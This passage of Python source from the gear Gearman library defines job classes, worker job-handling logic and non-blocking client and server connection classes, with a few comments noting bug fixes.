        self.log.debug("Job data; job: %s data: %s" %
                       (job, job.data))
        return job
    def handleWorkWarning(self, packet):
        """Handle a WORK_WARNING packet.

        Updates the referenced :py:class:`Job` with the returned data.

        :arg Packet packet: The :py:class:`Packet` that was received.
        :returns: The :py:class:`Job` object associated with the job request.
        :rtype: :py:class:`Job`
        """
        job = packet.getJob()
        data = packet.getArgument(1, True)
        if data:
            job.data.append(data)
        job.warning = True
        self.log.debug("Job warning; %s data: %s" %
                       (job, job.data))
        return job
    def handleWorkStatus(self, packet):
        """Handle a WORK_STATUS packet.

        Updates the referenced :py:class:`Job` with the returned data.

        :arg Packet packet: The :py:class:`Packet` that was received.
        :returns: The :py:class:`Job` object associated with the job request.
        :rtype: :py:class:`Job`
        """
        job = packet.getJob()
        job.numerator = packet.getArgument(1)
        job.denominator = packet.getArgument(2)
        try:
            job.fraction_complete = (float(job.numerator) /
                                     float(job.denominator))
        except Exception:
            # Non-numeric or zero denominator: progress is unknown.
            job.fraction_complete = None
        self.log.debug("Job status; %s complete: %s/%s" %
                       (job, job.numerator, job.denominator))
        return job
    def handleStatusRes(self, packet):
        """Handle a STATUS_RES packet.

        Updates the referenced :py:class:`Job` with the returned data.

        :arg Packet packet: The :py:class:`Packet` that was received.
        :returns: The :py:class:`Job` object associated with the job request.
        :rtype: :py:class:`Job`
        """
        job = packet.getJob()
        job.known = (packet.getArgument(1) == b'1')
        job.running = (packet.getArgument(2) == b'1')
        job.numerator = packet.getArgument(3)
        job.denominator = packet.getArgument(4)
        try:
            job.fraction_complete = (float(job.numerator) /
                                     float(job.denominator))
        except Exception:
            job.fraction_complete = None
        return job
    def handleOptionRes(self, packet):
        """Handle an OPTION_RES packet.

        Updates the set of options for the connection.

        :arg Packet packet: The :py:class:`Packet` that was received.
        :returns: None.
        """
        task = packet.connection.pending_tasks.pop(0)
        if not isinstance(task, OptionReqTask):
            msg = ("Unexpected response received to option "
                   "request: %s" % packet)
            self.log.error(msg)
            self._lostConnection(packet.connection)
            raise GearmanError(msg)
        packet.connection.handleOptionRes(packet.getArgument(0))
        task.setComplete()
class FunctionRecord(object):
    """Represents a function that should be registered with Gearman.

    Instances only need to be created directly for use with
    :py:meth:`Worker.setFunctions`.  If a timeout value is supplied,
    the function will be registered with CAN_DO_TIMEOUT.

    :arg str name: The name of the function to register.
    :arg numeric timeout: The timeout value (optional).
    """

    def __init__(self, name, timeout=None):
        self.name = name
        self.timeout = timeout

    def __repr__(self):
        return '<gear.FunctionRecord 0x%x name: %s timeout: %s>' % (
            id(self), self.name, self.timeout)
class BaseJob(object):
    """Common state for jobs on both the client and worker side.

    Normalizes the job name, argument blob and unique ID to bytes, and
    tracks the Gearman-assigned handle plus the connection the job is
    associated with.
    """

    def __init__(self, name, arguments, unique=None, handle=None):
        self._name = convert_to_bytes(name)
        self._validate_arguments(arguments)
        self._arguments = convert_to_bytes(arguments)
        self._unique = convert_to_bytes(unique)
        self.handle = handle
        self.connection = None

    def _validate_arguments(self, arguments):
        # Subclasses such as TextJobArguments relax this requirement.
        if not isinstance(arguments, (bytes, bytearray)):
            raise TypeError("arguments must be of type bytes or bytearray")

    @property
    def arguments(self):
        return self._arguments

    @arguments.setter
    def arguments(self, value):
        self._arguments = value

    @property
    def unique(self):
        return self._unique

    @unique.setter
    def unique(self, value):
        self._unique = value

    @property
    def name(self):
        # Present a bytes name as text; pass anything else through.
        raw = self._name
        if isinstance(raw, six.binary_type):
            return raw.decode('utf-8')
        return raw

    @name.setter
    def name(self, value):
        # Names are stored internally as UTF-8 bytes.
        if isinstance(value, six.text_type):
            value = value.encode('utf-8')
        self._name = value

    @property
    def binary_name(self):
        return self._name

    @property
    def binary_arguments(self):
        return self._arguments

    @property
    def binary_unique(self):
        return self._unique

    def __repr__(self):
        return '<gear.Job 0x%x handle: %s name: %s unique: %s>' % (
            id(self), self.handle, self.name, self.unique)
class WorkerJob(BaseJob):
    """A job that Gearman has assigned to a Worker.  Not intended to
    be instantiated directly, but rather returned by
    :py:meth:`Worker.getJob`.

    :arg str handle: The job handle assigned by gearman.
    :arg str name: The name of the job.
    :arg bytes arguments: The opaque data blob passed to the worker
        as arguments.
    :arg str unique: A byte string to uniquely identify the job to Gearman
        (optional).

    The following instance attributes are available:

    **name** (str)
        The name of the job.  Assumed to be utf-8.
    **arguments** (bytes)
        The opaque data blob passed to the worker as arguments.
    **unique** (str or None)
        The unique ID of the job (if supplied).
    **handle** (bytes)
        The Gearman job handle.
    **connection** (:py:class:`Connection` or None)
        The connection associated with the job.  Only set after the job
        has been submitted to a Gearman server.
    """

    def __init__(self, handle, name, arguments, unique=None):
        super(WorkerJob, self).__init__(name, arguments, unique, handle)

    def _sendPacket(self, packet_type, payload):
        # All WORK_* messages share the same shape: a REQ packet sent on
        # the connection this job arrived on.
        self.connection.sendPacket(Packet(constants.REQ, packet_type,
                                          payload))

    def sendWorkData(self, data=b''):
        """Send a WORK_DATA packet to the client.

        :arg bytes data: The data to be sent to the client (optional).
        """
        self._sendPacket(constants.WORK_DATA, self.handle + b'\x00' + data)

    def sendWorkWarning(self, data=b''):
        """Send a WORK_WARNING packet to the client.

        :arg bytes data: The data to be sent to the client (optional).
        """
        self._sendPacket(constants.WORK_WARNING, self.handle + b'\x00' + data)

    def sendWorkStatus(self, numerator, denominator):
        """Send a WORK_STATUS packet to the client.

        Sends a numerator and denominator that together represent the
        fraction complete of the job.

        :arg numeric numerator: The numerator of the fraction complete.
        :arg numeric denominator: The denominator of the fraction complete.
        """
        payload = (self.handle + b'\x00' +
                   str(numerator).encode('utf8') + b'\x00' +
                   str(denominator).encode('utf8'))
        self._sendPacket(constants.WORK_STATUS, payload)

    def sendWorkComplete(self, data=b''):
        """Send a WORK_COMPLETE packet to the client.

        :arg bytes data: The data to be sent to the client (optional).
        """
        self._sendPacket(constants.WORK_COMPLETE, self.handle + b'\x00' + data)

    def sendWorkFail(self):
        "Send a WORK_FAIL packet to the client."
        self._sendPacket(constants.WORK_FAIL, self.handle)

    def sendWorkException(self, data=b''):
        """Send a WORK_EXCEPTION packet to the client.

        :arg bytes data: The exception data to be sent to the client
            (optional).
        """
        self._sendPacket(constants.WORK_EXCEPTION,
                         self.handle + b'\x00' + data)
class Worker(BaseClient):
    """A Gearman worker.

    :arg str client_id: The client ID to provide to Gearman.  It will
        appear in administrative output and be appended to the name of
        the logger (e.g., gear.Worker.client_id).
    :arg str worker_id: The client ID to provide to Gearman.  It will
        appear in administrative output and be appended to the name of
        the logger (e.g., gear.Worker.client_id).  This parameter name
        is deprecated, use client_id instead.
    """
    # Class of job objects handed out by getJob(); subclasses (e.g.
    # TextWorker) override this to change decoding behavior.
    job_class = WorkerJob

    def __init__(self, client_id=None, worker_id=None):
        # BUG FIX: the previous guard was "if not client_id or worker_id:"
        # which raised whenever the (documented, deprecated) worker_id
        # argument was supplied, making the fallback below unreachable.
        # Require that at least one of the two identifiers is given.
        if not (client_id or worker_id):
            raise Exception("A client_id must be provided")
        if worker_id:
            client_id = worker_id
        super(Worker, self).__init__(client_id)
        self.log = logging.getLogger("gear.Worker.%s" % (self.client_id,))
        self.worker_id = client_id
        # Registered functions, keyed by (bytes) function name.
        self.functions = {}
        # Guards waiting_for_jobs and the per-connection state machine.
        self.job_lock = threading.Lock()
        # Number of threads currently blocked in getJob().
        self.waiting_for_jobs = 0
        # Jobs received from servers, consumed by getJob().
        self.job_queue = queue_mod.Queue()

    def __repr__(self):
        return '<gear.Worker 0x%x>' % id(self)

    def registerFunction(self, name, timeout=None):
        """Register a function with Gearman.

        If a timeout value is supplied, the function will be
        registered with CAN_DO_TIMEOUT.

        :arg str name: The name of the function to register.
        :arg numeric timeout: The timeout value (optional).
        """
        name = convert_to_bytes(name)
        self.functions[name] = FunctionRecord(name, timeout)
        if timeout:
            self._sendCanDoTimeout(name, timeout)
        else:
            self._sendCanDo(name)
        # Wake any sleeping connections so they can grab jobs for the
        # newly registered function.
        connections = self.active_connections[:]
        for connection in connections:
            if connection.state == "SLEEP":
                connection.changeState("IDLE")
        self._updateStateMachines()

    def unRegisterFunction(self, name):
        """Remove a function from Gearman's registry.

        :arg str name: The name of the function to remove.
        """
        name = convert_to_bytes(name)
        del self.functions[name]
        self._sendCantDo(name)

    def setFunctions(self, functions):
        """Replace the set of functions registered with Gearman.

        Accepts a list of :py:class:`FunctionRecord` objects which
        represents the complete set of functions that should be
        registered with Gearman.  Any existing functions will be
        unregistered and these registered in their place.  If the
        empty list is supplied, then the Gearman registered function
        set will be cleared.

        :arg list functions: A list of :py:class:`FunctionRecord` objects.
        """
        self._sendResetAbilities()
        self.functions = {}
        for f in functions:
            if not isinstance(f, FunctionRecord):
                raise InvalidDataError(
                    "An iterable of FunctionRecords is required.")
            self.functions[f.name] = f
        for f in self.functions.values():
            if f.timeout:
                self._sendCanDoTimeout(f.name, f.timeout)
            else:
                self._sendCanDo(f.name)

    def _sendCanDo(self, name):
        # Advertise the ability to run `name` on all connections.
        self.broadcast_lock.acquire()
        try:
            p = Packet(constants.REQ, constants.CAN_DO, name)
            self.broadcast(p)
        finally:
            self.broadcast_lock.release()

    def _sendCanDoTimeout(self, name, timeout):
        # As _sendCanDo, but with a server-side execution timeout.
        self.broadcast_lock.acquire()
        try:
            data = name + b'\x00' + timeout
            p = Packet(constants.REQ, constants.CAN_DO_TIMEOUT, data)
            self.broadcast(p)
        finally:
            self.broadcast_lock.release()

    def _sendCantDo(self, name):
        # Withdraw the ability to run `name` on all connections.
        self.broadcast_lock.acquire()
        try:
            p = Packet(constants.REQ, constants.CANT_DO, name)
            self.broadcast(p)
        finally:
            self.broadcast_lock.release()

    def _sendResetAbilities(self):
        # Clear all registered abilities on all connections.
        self.broadcast_lock.acquire()
        try:
            p = Packet(constants.REQ, constants.RESET_ABILITIES, b'')
            self.broadcast(p)
        finally:
            self.broadcast_lock.release()

    def _sendPreSleep(self, connection):
        # Tell the server we are idle; it will send NOOP to wake us.
        p = Packet(constants.REQ, constants.PRE_SLEEP, b'')
        self.sendPacket(p, connection)

    def _sendGrabJobUniq(self, connection=None):
        # Request a job assignment, on one connection or on all of them.
        p = Packet(constants.REQ, constants.GRAB_JOB_UNIQ, b'')
        if connection:
            self.sendPacket(p, connection)
        else:
            self.broadcast(p)

    def _onConnect(self, conn):
        self.broadcast_lock.acquire()
        try:
            # Called immediately after a successful (re-)connection
            p = Packet(constants.REQ, constants.SET_CLIENT_ID, self.client_id)
            conn.sendPacket(p)
            super(Worker, self)._onConnect(conn)
            # Re-register all functions on the fresh connection.
            for f in self.functions.values():
                if f.timeout:
                    data = f.name + b'\x00' + f.timeout
                    p = Packet(constants.REQ, constants.CAN_DO_TIMEOUT, data)
                else:
                    p = Packet(constants.REQ, constants.CAN_DO, f.name)
                conn.sendPacket(p)
            conn.changeState("IDLE")
        finally:
            self.broadcast_lock.release()
        # Any exceptions will be handled by the calling function, and the
        # connection will not be put into the pool.

    def _onActiveConnection(self, conn):
        self.job_lock.acquire()
        try:
            # If threads are waiting in getJob(), start grabbing jobs on
            # the newly active connection right away.
            if self.waiting_for_jobs > 0:
                self._updateStateMachines()
        finally:
            self.job_lock.release()

    def _updateStateMachines(self):
        # Reconcile each connection's state with the number of waiting
        # getJob() threads.  Caller must hold job_lock.
        connections = self.active_connections[:]
        for connection in connections:
            if (connection.state == "IDLE" and self.waiting_for_jobs > 0):
                self._sendGrabJobUniq(connection)
                connection.changeState("GRAB_WAIT")
            if (connection.state != "IDLE" and self.waiting_for_jobs < 1):
                connection.changeState("IDLE")

    def getJob(self):
        """Get a job from Gearman.

        Blocks until a job is received.  This method is re-entrant, so
        it is safe to call this method on a single worker from
        multiple threads.  In that case, one of them at random will
        receive the job assignment.

        :returns: The :py:class:`WorkerJob` assigned.
        :rtype: :py:class:`WorkerJob`.
        :raises InterruptedError: If interrupted (by
            :py:meth:`stopWaitingForJobs`) before a job is received.
        """
        self.job_lock.acquire()
        try:
            # self.running gets cleared during _shutdown(), before the
            # stopWaitingForJobs() is called.  This check has to
            # happen with the job_lock held, otherwise there would be
            # a window for race conditions between manipulation of
            # "running" and "waiting_for_jobs".
            if not self.running:
                raise InterruptedError()
            self.waiting_for_jobs += 1
            self.log.debug("Get job; number of threads waiting for jobs: %s" %
                           self.waiting_for_jobs)
            # Consume an already-queued job if one is available.
            try:
                job = self.job_queue.get(False)
            except queue_mod.Empty:
                job = None
            if not job:
                self._updateStateMachines()
        finally:
            self.job_lock.release()
        if not job:
            # Block until a job (or a None wake-up sentinel from
            # stopWaitingForJobs()) arrives.
            job = self.job_queue.get()
        self.log.debug("Received job: %s" % job)
        if job is None:
            raise InterruptedError()
        return job

    def stopWaitingForJobs(self):
        """Interrupts all running :py:meth:`getJob` calls, which will raise
        an exception.
        """
        self.job_lock.acquire()
        try:
            # Wait for all GRAB_WAIT connections to settle before
            # interrupting waiters, dropping any that take too long.
            while True:
                connections = self.active_connections[:]
                now = time.time()
                ok = True
                for connection in connections:
                    if connection.state == "GRAB_WAIT":
                        # Replies to GRAB_JOB should be fast, give up if
                        # we've been waiting for more than 5 seconds.
                        if now - connection.state_time > 5:
                            self._lostConnection(connection)
                        else:
                            ok = False
                if ok:
                    break
                else:
                    # Release the lock while sleeping so packet handlers
                    # can make progress.
                    self.job_lock.release()
                    time.sleep(0.1)
                    self.job_lock.acquire()
            # Push one None sentinel per waiting thread to unblock it.
            while self.waiting_for_jobs > 0:
                self.waiting_for_jobs -= 1
                self.job_queue.put(None)
            self._updateStateMachines()
        finally:
            self.job_lock.release()

    def _shutdown(self):
        self.job_lock.acquire()
        try:
            # The upstream _shutdown() will clear the "running" bool.
            # Because that is a variable which is used for proper
            # synchronization of the exit within getJob() which might be
            # about to be called from a separate thread, it's important
            # to call it with a proper lock being held.
            super(Worker, self)._shutdown()
        finally:
            self.job_lock.release()
        self.stopWaitingForJobs()

    def handleNoop(self, packet):
        """Handle a NOOP packet.

        Sends a GRAB_JOB_UNIQ packet on the same connection.
        GRAB_JOB_UNIQ will return jobs regardless of whether they have
        been specified with a unique identifier when submitted.  If
        they were not, then :py:attr:`WorkerJob.unique` attribute
        will be None.

        :arg Packet packet: The :py:class:`Packet` that was received.
        """
        self.job_lock.acquire()
        try:
            if packet.connection.state == "SLEEP":
                self.log.debug("Sending GRAB_JOB_UNIQ")
                self._sendGrabJobUniq(packet.connection)
                packet.connection.changeState("GRAB_WAIT")
            else:
                # Fixed typo in the log message ("unexpecetd").
                self.log.debug("Received unexpected NOOP packet on %s" %
                               packet.connection)
        finally:
            self.job_lock.release()

    def handleNoJob(self, packet):
        """Handle a NO_JOB packet.

        Sends a PRE_SLEEP packet on the same connection.

        :arg Packet packet: The :py:class:`Packet` that was received.
        """
        self.job_lock.acquire()
        try:
            if packet.connection.state == "GRAB_WAIT":
                self.log.debug("Sending PRE_SLEEP")
                self._sendPreSleep(packet.connection)
                packet.connection.changeState("SLEEP")
            else:
                self.log.debug("Received unexpected NO_JOB packet on %s" %
                               packet.connection)
        finally:
            self.job_lock.release()

    def handleJobAssign(self, packet):
        """Handle a JOB_ASSIGN packet.

        Adds a WorkerJob to the internal queue to be picked up by any
        threads waiting in :py:meth:`getJob`.

        :arg Packet packet: The :py:class:`Packet` that was received.
        """
        handle = packet.getArgument(0)
        name = packet.getArgument(1)
        arguments = packet.getArgument(2, True)
        return self._handleJobAssignment(packet, handle, name,
                                         arguments, None)

    def handleJobAssignUnique(self, packet):
        """Handle a JOB_ASSIGN_UNIQ packet.

        Adds a WorkerJob to the internal queue to be picked up by any
        threads waiting in :py:meth:`getJob`.

        :arg Packet packet: The :py:class:`Packet` that was received.
        """
        handle = packet.getArgument(0)
        name = packet.getArgument(1)
        unique = packet.getArgument(2)
        if unique == b'':
            unique = None
        arguments = packet.getArgument(3, True)
        return self._handleJobAssignment(packet, handle, name,
                                         arguments, unique)

    def _handleJobAssignment(self, packet, handle, name, arguments, unique):
        # Wrap the assignment in a job object and hand it to a waiting
        # getJob() thread via the queue.
        job = self.job_class(handle, name, arguments, unique)
        job.connection = packet.connection
        self.job_lock.acquire()
        try:
            packet.connection.changeState("IDLE")
            self.waiting_for_jobs -= 1
            self.log.debug("Job assigned; number of threads waiting for "
                           "jobs: %s" % self.waiting_for_jobs)
            self.job_queue.put(job)
            self._updateStateMachines()
        finally:
            self.job_lock.release()
class Job(BaseJob):
    """A job to run or being run by Gearman.

    :arg str name: The name of the job.
    :arg bytes arguments: The opaque data blob to be passed to the worker
        as arguments.
    :arg str unique: A byte string to uniquely identify the job to Gearman
        (optional).

    The following instance attributes are available:

    **name** (str)
        The name of the job.  Assumed to be utf-8.
    **arguments** (bytes)
        The opaque data blob passed to the worker as arguments.
    **unique** (str or None)
        The unique ID of the job (if supplied).
    **handle** (bytes or None)
        The Gearman job handle.  None if no job handle has been received
        yet.
    **data** (list of byte-arrays)
        The result data returned from Gearman.  Each packet appends an
        element to the list.  Depending on the nature of the data, the
        elements may need to be concatenated before use.
    **exception** (bytes or None)
        Exception information returned from Gearman.  None if no exception
        has been received.
    **warning** (bool)
        Whether the worker has reported a warning.
    **complete** (bool)
        Whether the job is complete.
    **failure** (bool)
        Whether the job has failed.  Only set when complete is True.
    **numerator** (bytes or None)
        The numerator of the completion ratio reported by the worker.
        Only set when a status update is sent by the worker.
    **denominator** (bytes or None)
        The denominator of the completion ratio reported by the
        worker.  Only set when a status update is sent by the worker.
    **fraction_complete** (float or None)
        The fractional complete ratio reported by the worker.  Only set
        when a status update is sent by the worker.
    **known** (bool or None)
        Whether the job is known to Gearman.  Only set by
        handleStatusRes() in response to a getStatus() query.
    **running** (bool or None)
        Whether the job is running.  Only set by handleStatusRes() in
        response to a getStatus() query.
    **connection** (:py:class:`Connection` or None)
        The connection associated with the job.  Only set after the job
        has been submitted to a Gearman server.
    """

    # Container used for received data; TextJob swaps in TextList.
    data_type = list

    def __init__(self, name, arguments, unique=None):
        super(Job, self).__init__(name, arguments, unique)
        self._data = self.data_type()
        self._exception = None
        # Progress/result bookkeeping, updated by the packet handlers.
        self.warning = False
        self.complete = False
        self.failure = False
        self.numerator = None
        self.denominator = None
        self.fraction_complete = None
        self.known = None
        self.running = None

    @property
    def binary_data(self):
        # Yield every data element as bytes, encoding text lazily.
        for item in self._data:
            if isinstance(item, six.text_type):
                item = item.encode('utf-8')
            yield item

    @property
    def exception(self):
        return self._exception

    @exception.setter
    def exception(self, value):
        self._exception = value

    @property
    def data(self):
        return self._data

    @data.setter
    def data(self, value):
        # Enforce the container type so subclasses (e.g. TextJob) keep
        # their decoding behavior.
        if not isinstance(value, self.data_type):
            raise ValueError(
                "data attribute must be {}".format(self.data_type))
        self._data = value
class TextJobArguments(object):
    """Mixin that treats job arguments as UTF-8 text in addition to name.

    If one is always dealing in valid utf-8, using this job class
    relieves one of the need to encode/decode constantly.
    """

    def _validate_arguments(self, arguments):
        # Accept any type; text is encoded to bytes on assignment.
        pass

    @property
    def arguments(self):
        raw = self._arguments
        if isinstance(raw, six.binary_type):
            return raw.decode('utf-8')
        return raw

    @arguments.setter
    def arguments(self, value):
        if not isinstance(value, six.binary_type):
            value = value.encode('utf-8')
        self._arguments = value
class TextJobUnique(object):
    """Mixin that treats the unique ID as UTF-8 text.

    If one is always dealing in valid utf-8, using this job class
    relieves one of the need to encode/decode constantly.
    """

    @property
    def unique(self):
        raw = self._unique
        if isinstance(raw, six.binary_type):
            return raw.decode('utf-8')
        return raw

    @unique.setter
    def unique(self, value):
        if not isinstance(value, six.binary_type):
            value = value.encode('utf-8')
        self._unique = value
class TextList(list):
    """A list that stores byte strings as UTF-8-decoded text.

    Bytes added via append/extend/insert are decoded to text; other
    values are stored unchanged.
    """

    def append(self, x):
        if isinstance(x, six.binary_type):
            x = x.decode('utf-8')
        super(TextList, self).append(x)

    def extend(self, iterable):
        def _iter():
            for value in iterable:
                if isinstance(value, six.binary_type):
                    yield value.decode('utf-8')
                else:
                    yield value
        # BUG FIX: the generator function must be *called*.  The previous
        # code passed the function object itself (extend(_iter)), which
        # made every extend() raise TypeError: 'function' object is not
        # iterable.
        super(TextList, self).extend(_iter())

    def insert(self, i, x):
        if isinstance(x, six.binary_type):
            x = x.decode('utf-8')
        super(TextList, self).insert(i, x)
class TextJob(TextJobArguments, TextJobUnique, Job):
    """ Sends and receives UTF-8 arguments and data.
    Use this instead of Job when you only expect to send valid UTF-8 through
    gearman. It will automatically encode arguments and work data as UTF-8,
    and any jobs fetched from this worker will have their arguments and data
    decoded assuming they are valid UTF-8, and thus return strings.
    Attributes and method signatures are the same as Job except as noted
    here:
    ** arguments ** (str) This will be returned as a string.
    ** data ** (tuple of str) This will be returned as a tuple of strings.
    """
    # TextList decodes each received data element from bytes to text.
    data_type = TextList
    @property
    def exception(self):
        # Present a bytes exception payload as text to the caller.
        exception = self._exception
        if isinstance(exception, six.binary_type):
            return exception.decode('utf-8')
        return exception
    @exception.setter
    def exception(self, value):
        # Exceptions are stored internally as UTF-8 bytes.
        if not isinstance(value, six.binary_type):
            value = value.encode('utf-8')
        self._exception = value
class TextWorkerJob(TextJobArguments, TextJobUnique, WorkerJob):
    """ Sends and receives UTF-8 arguments and data.

    See TextJob. sendWorkData and sendWorkWarning accept strings
    and will encode them as UTF-8.
    """

    @staticmethod
    def _utf8(data):
        # Text is encoded as UTF-8; bytes pass through untouched.
        if isinstance(data, six.text_type):
            return data.encode('utf8')
        return data

    def sendWorkData(self, data=''):
        """Send a WORK_DATA packet to the client.

        :arg str data: The data to be sent to the client (optional).
        """
        return super(TextWorkerJob, self).sendWorkData(self._utf8(data))

    def sendWorkWarning(self, data=''):
        """Send a WORK_WARNING packet to the client.

        :arg str data: The data to be sent to the client (optional).
        """
        return super(TextWorkerJob, self).sendWorkWarning(self._utf8(data))

    def sendWorkComplete(self, data=''):
        """Send a WORK_COMPLETE packet to the client.

        :arg str data: The data to be sent to the client (optional).
        """
        return super(TextWorkerJob, self).sendWorkComplete(self._utf8(data))

    def sendWorkException(self, data=''):
        """Send a WORK_EXCEPTION packet to the client.

        :arg str data: The data to be sent to the client (optional).
        """
        return super(TextWorkerJob, self).sendWorkException(self._utf8(data))
class TextWorker(Worker):
    """ Sends and receives UTF-8 only.

    See TextJob.
    """
    # Jobs fetched by this worker decode arguments/unique as UTF-8.
    job_class = TextWorkerJob
class BaseBinaryJob(object):
    """ For the case where non-utf-8 job names are needed. It will function
    exactly like Job, except that the job name will not be decoded."""

    @property
    def name(self):
        # Return the stored name as-is (raw bytes); no UTF-8 decoding.
        return self._name


class BinaryWorkerJob(BaseBinaryJob, WorkerJob):
    # WorkerJob variant whose name stays as raw bytes.
    pass


class BinaryJob(BaseBinaryJob, Job):
    # Job variant whose name stays as raw bytes.
    pass
# Below are classes for use in the server implementation:
class ServerJob(BinaryJob):
    """A job record for use in a server.

    :arg str name: The name of the job.
    :arg bytes arguments: The opaque data blob to be passed to the worker
        as arguments.
    :arg str unique: A byte string to uniquely identify the job to Gearman
        (optional).

    The following instance attributes are available:

    **name** (str)
        The name of the job.
    **arguments** (bytes)
        The opaque data blob passed to the worker as arguments.
    **unique** (str or None)
        The unique ID of the job (if supplied).
    **handle** (bytes or None)
        The Gearman job handle.  None if no job handle has been received yet.
    **data** (list of byte-arrays)
        The result data returned from Gearman.  Each packet appends an
        element to the list.  Depending on the nature of the data, the
        elements may need to be concatenated before use.
    **exception** (bytes or None)
        Exception information returned from Gearman.  None if no exception
        has been received.
    **warning** (bool)
        Whether the worker has reported a warning.
    **complete** (bool)
        Whether the job is complete.
    **failure** (bool)
        Whether the job has failed.  Only set when complete is True.
    **numerator** (bytes or None)
        The numerator of the completion ratio reported by the worker.
        Only set when a status update is sent by the worker.
    **denominator** (bytes or None)
        The denominator of the completion ratio reported by the
        worker.  Only set when a status update is sent by the worker.
    **fraction_complete** (float or None)
        The fractional complete ratio reported by the worker.  Only set when
        a status update is sent by the worker.
    **known** (bool or None)
        Whether the job is known to Gearman.  Only set by handleStatusRes() in
        response to a getStatus() query.
    **running** (bool or None)
        Whether the job is running.  Only set by handleStatusRes() in
        response to a getStatus() query.
    **client_connection** :py:class:`Connection`
        The client connection associated with the job.
    **worker_connection** (:py:class:`Connection` or None)
        The worker connection associated with the job.  Only set after the job
        has been assigned to a worker.
    """

    def __init__(self, handle, name, arguments, client_connection,
                 unique=None):
        super(ServerJob, self).__init__(name, arguments, unique)
        self.handle = handle
        self.client_connection = client_connection
        # Set when the job is handed to a worker (getJobForConnection).
        self.worker_connection = None
        # The single inherited 'connection' attribute is replaced by the
        # explicit client/worker connection attributes above.
        del self.connection
class ServerAdminRequest(AdminRequest):
    """An administrative request sent to a server."""

    def __init__(self, connection):
        super(ServerAdminRequest, self).__init__()
        self.connection = connection

    def isComplete(self, data):
        # A request is complete once a newline has arrived; everything
        # before the newline is the command, the rest is left over.
        newline_at = data.find(b'\n')
        if newline_at == -1:
            return (False, None)
        self.command = data[:newline_at]
        remainder = data[newline_at + 1:]
        return (True, remainder)
class NonBlockingConnection(Connection):
    """A Non-blocking connection to a Gearman Client."""

    def __init__(self, host, port, ssl_key=None, ssl_cert=None, ssl_ca=None,
                 client_id='unknown', keepalive=False, tcp_keepidle=7200,
                 tcp_keepintvl=75, tcp_keepcnt=9):
        super(NonBlockingConnection, self).__init__(
            host, port, ssl_key,
            ssl_cert, ssl_ca, client_id, keepalive,
            tcp_keepidle, tcp_keepintvl, tcp_keepcnt)
        # Outbound byte strings not yet written to the socket.
        self.send_queue = []

    def connect(self):
        # Connect, then switch the socket into non-blocking mode.
        super(NonBlockingConnection, self).connect()
        if self.connected and self.conn:
            self.conn.setblocking(0)

    def _readRawBytes(self, bytes_to_read):
        # Read up to bytes_to_read bytes; RetryIOError tells the caller
        # to wait until the next poll event for this connection.
        try:
            buff = self.conn.recv(bytes_to_read)
        except ssl.SSLWantReadError:
            raise RetryIOError()
        except ssl.SSLWantWriteError:
            raise RetryIOError()
        except socket.error as e:
            if e.errno == errno.EAGAIN:
                # Read operation would block, we're done until
                # epoll flags this connection again
                raise RetryIOError()
            raise
        return buff

    def sendPacket(self, packet):
        """Append a packet to this connection's send queue.  The Client or
        Server must manage actually sending the data.

        :arg :py:class:`Packet` packet The packet to send
        """
        self.log.debug("Queuing packet to %s: %s" % (self, packet))
        self.send_queue.append(packet.toBinary())
        self.sendQueuedData()

    def sendRaw(self, data):
        """Append raw data to this connection's send queue.  The Client or
        Server must manage actually sending the data.

        :arg bytes data The raw data to send
        """
        self.log.debug("Queuing data to %s: %s" % (self, data))
        self.send_queue.append(data)
        self.sendQueuedData()

    def sendQueuedData(self):
        """Send previously queued data to the socket."""
        try:
            while len(self.send_queue):
                data = self.send_queue.pop(0)
                # r stays 0 if send() raises, so the finally clause
                # requeues the whole chunk in that case.
                r = 0
                try:
                    r = self.conn.send(data)
                except ssl.SSLWantReadError:
                    raise RetryIOError()
                except ssl.SSLWantWriteError:
                    raise RetryIOError()
                except socket.error as e:
                    if e.errno == errno.EAGAIN:
                        self.log.debug("Write operation on %s would block"
                                       % self)
                        raise RetryIOError()
                    else:
                        raise
                finally:
                    # Put any untransmitted remainder back at the front
                    # of the queue so ordering is preserved.
                    data = data[r:]
                    if data:
                        self.send_queue.insert(0, data)
        except RetryIOError:
            # Try again on the next poll event for this connection.
            pass
class ServerConnection(NonBlockingConnection):
    """A Connection to a Gearman Client."""

    def __init__(self, addr, conn, use_ssl, client_id):
        # NOTE: intentionally does not call the parent __init__ — the
        # socket is already accepted, so attributes are set up directly.
        if client_id:
            self.log = logging.getLogger("gear.ServerConnection.%s" %
                                         (client_id,))
        else:
            self.log = logging.getLogger("gear.ServerConnection")
        self.send_queue = []
        self.admin_requests = []
        self.host = addr[0]
        self.port = addr[1]
        self.conn = conn
        self.conn.setblocking(0)
        self.input_buffer = b''
        self.need_bytes = False
        self.use_ssl = use_ssl
        # The remote's own id; the client_id argument above only names
        # the logger.  Set later when a SET_CLIENT_ID packet arrives.
        self.client_id = None
        # Function names this worker has registered via CAN_DO.
        self.functions = set()
        # Jobs submitted or worked on by this connection, keyed by handle.
        self.related_jobs = {}
        self.ssl_subject = None
        if self.use_ssl:
            # Record the peer certificate's commonName for ACL checks.
            for x in conn.getpeercert()['subject']:
                if x[0][0] == 'commonName':
                    self.ssl_subject = x[0][1]
            self.log.debug("SSL subject: %s" % self.ssl_subject)
        self.changeState("INIT")

    def _getAdminRequest(self):
        return ServerAdminRequest(self)

    def _putAdminRequest(self, req):
        # The server does not need to keep track of admin requests
        # that have been partially received; it will simply create a
        # new instance the next time it tries to read.
        pass

    def __repr__(self):
        return '<gear.ServerConnection 0x%x name: %s host: %s port: %s>' % (
            id(self), self.client_id, self.host, self.port)
class Server(BaseClientServer):
    """A simple gearman server implementation for testing
    (not for production use).

    :arg int port: The TCP port on which to listen.
    :arg str ssl_key: Path to the SSL private key.
    :arg str ssl_cert: Path to the SSL certificate.
    :arg str ssl_ca: Path to the CA certificate.
    :arg str statsd_host: statsd hostname. None means disabled
        (the default).
    :arg str statsd_port: statsd port (defaults to 8125).
    :arg str statsd_prefix: statsd key prefix.
    :arg str server_id: The ID associated with this server.
        It will be appended to the name of the logger (e.g.,
        gear.Server.server_id). Defaults to None (unused).
    :arg ACL acl: An :py:class:`ACL` object if the server should apply
        access control rules to its connections.
    :arg str host: Host name or IPv4/IPv6 address to bind to. Defaults
        to "whatever getaddrinfo() returns", which might be IPv4-only.
    :arg bool keepalive: Whether to use TCP keepalives
    :arg int tcp_keepidle: Idle time after which to start keepalives sending
    :arg int tcp_keepintvl: Interval in seconds between TCP keepalives
    :arg int tcp_keepcnt: Count of TCP keepalives to send before disconnect
    """

    # Edge-triggered epoll: every readiness event must be fully drained
    # because it will not be reported again until new activity occurs.
